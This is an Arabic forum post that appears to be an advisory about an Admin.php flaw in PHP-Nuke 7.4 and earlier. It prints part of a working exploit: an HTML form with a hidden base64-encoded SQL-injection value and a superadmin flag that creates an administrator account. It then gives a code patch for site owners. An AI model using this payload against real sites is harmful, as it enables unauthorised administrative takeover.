السلام عليكم ورحمة الله وبركاته
اسعد الله مبدعي سوالف سوفت ,
الثغرة في ملف : Admin.php
وهي عبارة عن استثمار .. لخطاء برمجي بالملف ,,
يمّكن المخترق من الحصول على حساب ادامن في مجلة النيوك ,,
الاصدارات المصابة : 7.4 وما تحتها من اصدارات ,
وهذا جزء من الكود الاستثماري للثغرة طبعا كود html:
كود PHP:
NOME:
<input type="text" name="add_name">
<br>
PASSWORD:
<input type="text" name="add_pwd">
<br>
E-MAIL:
<input type="text" name="add_email">
<br>
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<br>
<input type="hidden" name="add_radminsuper" value="1">
<br>
<input type="hidden" name="op" value="AddAuthor">
</p>
<p>
<input type="submit" name="Submit" value="Create Admin">
<br>
</p>
</form>
الترقيع الصحيح :
قم باضافة هذة السطور الى ملف admin.php
كود PHP:
if ( !empty($HTTP_GET_VARS['op']) ) {
$op = $HTTP_GET_VARS['op'];
}
if ( !empty($HTTP_POST_VARS['op']) ) {
$op = $HTTP_POST_VARS['op'];
}
مكتشف الثغرة : غير معروف
مع التحية اخواني اصحاب المواقع ,